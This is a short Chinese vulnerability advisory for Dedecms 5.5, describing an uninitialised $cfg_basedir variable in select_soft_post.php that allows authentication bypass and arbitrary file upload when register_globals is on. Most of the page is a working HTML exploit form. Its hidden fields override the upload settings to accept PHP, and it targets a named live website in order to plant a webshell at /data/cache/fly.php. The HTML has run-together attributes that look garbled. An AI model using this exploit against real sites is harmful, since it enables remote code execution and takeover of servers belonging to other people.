漏洞版本:

Dedecms 5.5

漏洞描述:

漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。

测试方法:

  • <html>
  • <head>
  • <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
  • </head>
  • <bodystyle="FONT-SIZE:9pt">
  • ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br/><br/>
  • <formaction=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.phpmethod='POST'enctype="multipart/form-data"name='myform'>
  • <inputtype='hidden'name='activepath'value='/data/cache/'/>
  • <inputtype='hidden'name='cfg_basedir'value='../../'/>
  • <inputtype='hidden'name='cfg_imgtype'value='php'/>
  • <inputtype='hidden'name='cfg_not_allowall'value='txt'/>
  • <inputtype='hidden'name='cfg_softtype'value='php'/>
  • <inputtype='hidden'name='cfg_mediatype'value='php'/>
  • <inputtype='hidden'name='f'value='form1.enclosure'/>
  • <inputtype='hidden'name='job'value='upload'/>
  • <inputtype='hidden'name='newname'value='fly.php'/>
  • Select U Shell <inputtype='file'name='uploadfile'size='25'/>
  • <inputtype='submit'name='sb1'value='确定'/>
  • </form>
  • <br/>It's just a exp for the bug of Dedecms V55...<br/>
  • Need register_globals = on...<br/>
  • Fun the game,get a webshell at /data/cache/fly.php...<br/>
  • </body>
  • </html>
  • 相关文章: